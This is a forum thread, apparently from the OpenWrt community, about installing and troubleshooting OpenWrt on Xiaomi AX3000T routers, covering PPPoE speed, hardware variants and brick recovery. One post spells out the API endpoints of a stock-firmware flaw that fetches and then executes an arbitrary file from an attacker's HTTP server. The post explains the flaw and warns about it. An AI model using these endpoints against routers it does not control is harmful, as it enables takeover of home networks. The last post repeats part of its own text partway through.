No entry 192.168.1.1
It worked on another computer, but I can't access it from my main computer. Why?
Again, the solid blue light means everything is working normally. Try opening 192.168.1.1 in a different browser or in incognito mode. Restart your PC. To be sure, also check 192.168.31.1 in case the old firmware is still loaded. Be sure that only middle port (2 or 3) is used on router.
1 Like
There are a lot of reasons, and it is obviously out of this topic. One of them could be that your main PC is already connected to another main router with the same subnet 192.168.1.0/24. Set your AX3000T ip to another (non-default) subnet like 192.168.2.1 and try to reach it.
Yes, the interface is opened on my main computer, thank you.
I am using a Xiaomi AX3000T router running the latest OpenWrt snapshot. My ISP connection is gigabit fiber with PPPoE authentication.
When I configure my ONT to handle PPPoE and use the AX3000T as a client router, I get close to full gigabit speed. However, when I switch the ONT to bridge mode and have the AX3000T handle the PPPoE authentication, my speed drops drastically to about 165 Mbps.
I have tried all the usual tuning: setting correct MTU, enabling and disabling hardware offloading and various firewall and QoS tweaks. None have improved the PPPoE throughput.
Interestingly, I observed a similar speed limitation with the stock Xiaomi firmware running PPPoE on the router. So this doesn't seem limited to OpenWrt or its snapshot builds.
Anyone emcountred a similar problem?
Latest XMiR-Patcher support new vulnerbility into get_icon (present only into INT firmwares).
All firmware for RD23 are supported by the patcher.
1 Like
Using stock firmware here, when dialing PPPoE, I can fully reach gigabit speed.
The same applies under NAT.
Stock version: 1.0.47
Ouch, another nasty exploit. Running the stock firmware is a major risk, if an attacker has gained web access (considering this and the other exploits allowing you to RCE).
This one: an attacker can upload any file to the router through /cgi-bin/luci/;stok=token/api/xqsystem/get_icon?ip=ip:port&name=filename, where ip:port is a man-in-the-middle HTTP server you are running that replies to GET on path filename. The file can be executed through /cgi-bin/luci/;stok=token/api/xqsystem/upload_logif you had written your file to /etc/diag_info/stat/firewall/.
3 Likes
Thanks for the feedback and for researching how it works ))
The link mentioned in the commit is russian, and I didn’t feel like trusting auto translate for this, so I went through your connect7.py script to see what this exploit was about and wrote a TL;DR in case someone wants to update the wiki.
Cool stuff, if you plan on installing OpenWrt without manufacturer support. Nasty stuff, if you are a normie running the stock firmware with basic/default web passwords.
2 Likes
This seller offers the RD03 model on the Mediatek Filogic 820 SoC, and if you click on the upgraded version, you will get the RD03v2.
And if they run out of the RD03 model, they'll send you the upgraded model at no extra charge...
Then simply send it back. Returns are free within 90 days.
WR3000S and WR3000E have the same hardware specs as the AX3000T, but with an extra ethernet port. Get those if you can find them for around the same price and you won’t have to deal with Xiaomi’s bullshit.
WR3000P is snapshot-only (for now), same SoC as the others, but an extra 256 of RAM, an USB port and the WAN port is 2.5 gbps instead of 1.
2 Likes
The link is russian, everything is written in russian, I don’t speak russian and auto translate sucks.
Is this so hard to understand? How about you take 5 minutes of your time to re-read my post, which clearly mentions not trusting auto translate, instead of berating others.
3 Likes
I tried using snapshot and the image from this fork, but after I install luci via ssh and load the image, I get the same result as 24.10.2, soft brick, it lights the orange led, stays on, connect, then power off and on again.
To the people that made it work without using UART, did you take any other step? Should I erase FORESEE NAND chip before loading the image somehow?
Btw, after i brick it I just hard reset it(power on with reset button) and load the origial firmware with the miwifi repair tool
I have 3 routers RD03 all with FORESEE NAND where two of them are working properly with 24.10.1 while the last one got bricked due to bad blocks, the only way to recover it was UART and now is running the last release from dimfishr (same fork you mentioned).
I think I'm going to try it again, did you do anything differently with the last router? Did you use XMiR-Patcher by any chance?
I have used XMiR-Patcher on all of them, all working ok at first sight but the last router started hanging with small load and finally it got unable to login. The only difference was on that one I installed remittor’s firmware instead of the “OEM” openWRT, maybe it was the firmware (due to its size, larger than standard) or just the NAND that has the 1% probability.
Tried to recover with Xiaomi official tool didn’t help and finally it wI have used XMiR-Patcher on all of them, all working ok at first sight but the last router started hanging with small load and finally it got unable to login. The only difference was on that one I installed remittor’s firmware instead of the “OEM” openWRT, maybe it was the firmware (due to its size, larger than standard) or just the NAND that could be the 1% device with bad blocks .
Tried to recover with Xiaomi official tool didn’t help and finally it was restored using the UART method.